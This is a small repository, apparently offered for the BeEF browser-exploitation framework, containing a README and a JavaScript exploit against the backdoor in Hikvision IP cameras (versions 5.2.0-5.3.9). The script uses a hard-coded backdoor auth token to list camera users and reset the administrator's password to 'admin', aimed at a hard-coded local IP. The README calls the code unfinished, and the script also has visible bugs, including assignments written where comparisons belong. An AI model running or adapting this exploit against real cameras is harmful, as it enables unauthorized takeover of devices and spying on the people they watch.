├── README.md
└── exploit.js


/README.md:
--------------------------------------------------------------------------------
1 | # hikvisionBackdoorExploit
2 | Hikvision camera backdoor exploit for beef framework (hikvision versions 5.2.0 - 5.3.9)
3 | 
4 | 
5 | # This is not finished, works from browser console only.
6 | 


--------------------------------------------------------------------------------
/exploit.js:
--------------------------------------------------------------------------------
 1 | var errorMessage = 'Could not execute exploit.';
 2 | var newPassword = "admin";
 3 | var backdoorAuthArg = "auth=YWRtaW46MTEK";
 4 | 
 5 | function httpGet(url, callback) {
 6 |     var xhr = new XMLHttpRequest();
 7 |     xhr.withCredentials = false;
 8 |     xhr.open("GET", url, true, "admin", "admin");
 9 |     xhr.onreadystatechange = (function processRequest(e) {
10 |         if( xhr.readyState == 4 && xhr.status == 200) {
11 |             return callback(xhr.responseText);
12 |         }
13 |         else if(xhr.status >= 400){
14 |             return callback(errorMessage);
15 |         }
16 |     });
17 |     xhr.send();
18 | }
19 | 
20 | function hikvisionGetUserList(ip, callback) {
21 |     httpGet(ip + "/Security/users?" + backdoorAuthArg, function returned(response){
22 |         if(response != errorMessage) {
23 |             var xmlDoc = (new DOMParser()).parseFromString(response,"text/xml").getElementsByTagName("UserList")[0];
24 |             return callback(xmlDoc);
25 |         }
26 |         return callback(errorMessage);
27 |     });
28 | }
29 | 
30 | function hikvisionChangeUserPassword(ip, userid, username, password, callback) {
31 |     var userXml = 
32 |     '<User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema">\
33 |         <id>' + userid + '</id>\
34 |         <userName>' + username + '</userName>\
35 |         <password>' + password + '</password>\
36 |     </User>';
37 |     var parser = new DOMParser();
38 |     var xmlDoc = parser.parseFromString(userXml,"text/xml");
39 | 
40 |     var url = ip + "/Security/users/" + userid + "?" + backdoorAuthArg;
41 |     var xhr = new XMLHttpRequest();
42 |     xhr.open("PUT", url, true);
43 |     xhr.send(userXml);
44 |     xhr.onreadystatechange = (function processRequest(e) {
45 |         if( xhr.readyState == 4 && xhr.status == 200) {
46 |             return callback(xhr.responseText);
47 |         }
48 |         else if(xhr.status >= 400){
49 |             return callback(errorMessage);
50 |         }
51 |     });
52 |     console.log(xmlDoc);
53 | }
54 | 
55 | function exploit(ip, password) {
56 |     hikvisionGetUserList(ip, function returned(xmlDoc) {
57 |         if(userList != errorMessage) {
58 |             var userList = xmlDoc.getElementsByTagName("User");
59 |             for (i = 0; i < userList.length; i++) {
60 |                 var priority = userList[i].getElementsByTagName("priority")[0].innerHTML;
61 |                 var id = userList[i].getElementsByTagName("id")[0].innerHTML;
62 |                 var userName = userList[i].getElementsByTagName("userName")[0].innerHTML;
63 |                 var userLevel = userList[i].getElementsByTagName("userLevel")[0].innerHTML;
64 | 
65 |                 if(priority = "high"){
66 |                     if(userLevel = "Administrator"){
67 |                         hikvisionChangeUserPassword(ip, id, userName, password, function call(response) {
68 |                             console.log(response);
69 |                         });
70 |                         return 1;
71 |                     }
72 |                 }
73 |             }
74 |         }
75 |         return errorMessage;
76 |     });
77 | }
78 | 
79 | 
80 | exploit("https://192.168.1.203", newPassword);
81 | 


--------------------------------------------------------------------------------